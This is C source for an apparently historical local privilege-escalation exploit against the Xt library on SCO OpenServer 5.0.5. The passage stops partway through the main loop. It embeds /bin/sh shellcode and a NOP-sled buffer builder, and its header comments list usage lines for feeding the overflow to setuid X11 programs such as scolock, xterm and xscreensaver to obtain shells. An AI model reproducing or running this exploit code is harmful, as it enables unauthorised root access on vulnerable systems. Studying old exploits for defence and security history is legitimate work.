/* * Generic SCO Xt library overflow program by * Brock Tellier btellier@webley.com * * Tested on SCO 5.0.5+Skunkware98 * All programs using the Xt library are believed vulnerable * * Compile gcc -o sco_xt sco_xt.c * Usage: /usr/bin/X11/scolock -bg `./sco_xt -9000 2000` * /usr/bin/X11/xmcd -bg `./sco_xt -8500 2000` * /usr/bin/X11/xlock -bg `./sco_xt -8500 2000` * /usr/bin/X11/xterm -bg `./sco_xt -9000 2000` * * NOTE: xscreensaver and xload are vulnerable to the overflow * but drop privs before the overflow occurs. Of course, * they were suid auth so that they could read /etc/shadow * and thus your shellcode could exploit something along * those lines. I got shells out of them by doing: * * /usr/bin/X11/xscreensaver -bg `./sco_xt -8404 2200` * /usr/bin/X11/xload -bg `./sco_xt -8404 2200` */ #include #include char scoshell[]= /* doble@iname.com */ "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; #define LEN 10000 #define NOP 0x90 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char *argv[]) { long int offset=0; int i; int buflen = LEN; long int addr; char buf[LEN]; if(argc < 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else { offset=atoi(argv[1]); buflen=atoi(argv[2]); } addr=get_sp(); fprintf(stderr, "Generic SCO Xt library overflow program\n"); fprintf(stderr, "By Brock Tellier btellier@webley.com\n\n"); fprintf(stderr, "Using addr: 0x%x\n", addr-offset); memset(buf,NOP,buflen); memcpy(buf+(buflen/2),scoshell,strlen(scoshell)); for(i=((buflen/2) + strlen(scoshell))+4;i